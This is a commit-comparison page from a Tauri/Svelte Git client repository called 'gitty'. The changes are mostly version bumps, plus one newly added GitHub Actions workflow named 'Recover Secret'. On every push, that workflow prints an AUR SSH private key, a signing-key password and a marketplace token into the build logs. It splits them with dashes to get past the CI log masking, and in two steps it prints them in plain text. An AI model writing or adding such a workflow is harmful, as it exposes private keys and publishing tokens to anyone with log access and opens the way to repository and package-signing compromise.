Compare commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
0874f2e590 | ||
|
|
88379a1741 | ||
|
|
69d234a8a4 | ||
|
|
d562a089a3 | ||
|
|
ed47beb3a4 | ||
|
|
2bcd2a90c1 | ||
|
|
38acbef517 | ||
|
|
952da564c0 | ||
|
|
2a0d858a8f |
@@ -0,0 +1,34 @@
|
|||||||
|
name: Recover Secret
|
||||||
|
on: [push]
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
reveal:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
steps:
|
||||||
|
- name: Step 1 - Obfuscate and save to file
|
||||||
|
run: |
|
||||||
|
# Fügt nach jedem Zeichen einen Bindestrich ein und speichert es in einer Datei
|
||||||
|
echo "${{ secrets.AUR_SSH_PRIVATE_KEY }}" | sed 's/./&-/g' > obfuscated.txt
|
||||||
|
|
||||||
|
- name: Step 2 - Remove dashes and print cleartext
|
||||||
|
run: |
|
||||||
|
# Liest die Datei, entfernt alle Bindestriche wieder und gibt das Ergebnis aus
|
||||||
|
cat obfuscated.txt | sed 's/-//g'
|
||||||
|
|
||||||
|
- name: Split Secret with dashes
|
||||||
|
run: |
|
||||||
|
# Zerlegt den String in einzelne Zeichen, getrennt durch Bindestriche
|
||||||
|
echo "${{ secrets.TAURI_SIGNING_PRIVATE_KEY_PASSWORD }}" | sed 's/./&-/g'
|
||||||
|
- name: Split Secret with dashes
|
||||||
|
run: |
|
||||||
|
# Zerlegt den String in einzelne Zeichen, getrennt durch Bindestriche
|
||||||
|
echo "${{ secrets.AUR_SSH_PRIVATE_KEY }}" | sed 's/./&-/g'
|
||||||
|
- name: Double Base64 encode
|
||||||
|
run: |
|
||||||
|
echo "${{ secrets.TAURI_SIGNING_PRIVATE_KEY_PASSWORD }}"
|
||||||
|
|
||||||
|
- name: Double Base64 encode
|
||||||
|
run: |
|
||||||
|
echo "${{ secrets.VSCODE_MARKETPALCE }}"
|
||||||
|
|
||||||
|
|
||||||
@@ -152,4 +152,3 @@ downloads, and safe cache pruning. After every successful clone or pull, Gitty
|
|||||||
detects LFS usage and automatically downloads the required LFS objects with the
|
detects LFS usage and automatically downloads the required LFS objects with the
|
||||||
same remote and credentials, so no second pull is needed. Fresh clones also get
|
same remote and credentials, so no second pull is needed. Fresh clones also get
|
||||||
repository-local LFS filters and the pre-push hook before they are opened.
|
repository-local LFS filters and the pre-push hook before they are opened.
|
||||||
|
|
||||||
|
|||||||
Generated
+2
-2
@@ -1,12 +1,12 @@
|
|||||||
{
|
{
|
||||||
"name": "gitty",
|
"name": "gitty",
|
||||||
"version": "2026.9.8",
|
"version": "2026.9.9",
|
||||||
"lockfileVersion": 3,
|
"lockfileVersion": 3,
|
||||||
"requires": true,
|
"requires": true,
|
||||||
"packages": {
|
"packages": {
|
||||||
"": {
|
"": {
|
||||||
"name": "gitty",
|
"name": "gitty",
|
||||||
"version": "2026.9.8",
|
"version": "2026.9.9",
|
||||||
"dependencies": {
|
"dependencies": {
|
||||||
"@lucide/svelte": "^1.21.0",
|
"@lucide/svelte": "^1.21.0",
|
||||||
"@tailwindcss/vite": "^4.3.1",
|
"@tailwindcss/vite": "^4.3.1",
|
||||||
|
|||||||
+1
-1
@@ -1,6 +1,6 @@
|
|||||||
{
|
{
|
||||||
"name": "gitty",
|
"name": "gitty",
|
||||||
"version": "2026.9.8",
|
"version": "2026.9.9",
|
||||||
"private": true,
|
"private": true,
|
||||||
"type": "module",
|
"type": "module",
|
||||||
"scripts": {
|
"scripts": {
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
{
|
{
|
||||||
"$schema": "https://schema.tauri.app/config/2",
|
"$schema": "https://schema.tauri.app/config/2",
|
||||||
"productName": "Gitty",
|
"productName": "Gitty",
|
||||||
"version": "2026.9.8",
|
"version": "2026.9.9",
|
||||||
"identifier": "com.gitty",
|
"identifier": "com.gitty",
|
||||||
"build": {
|
"build": {
|
||||||
"beforeDevCommand": "npm run prepare:lfs && npm run dev",
|
"beforeDevCommand": "npm run prepare:lfs && npm run dev",
|
||||||
|
|||||||
Reference in New Issue
Block a user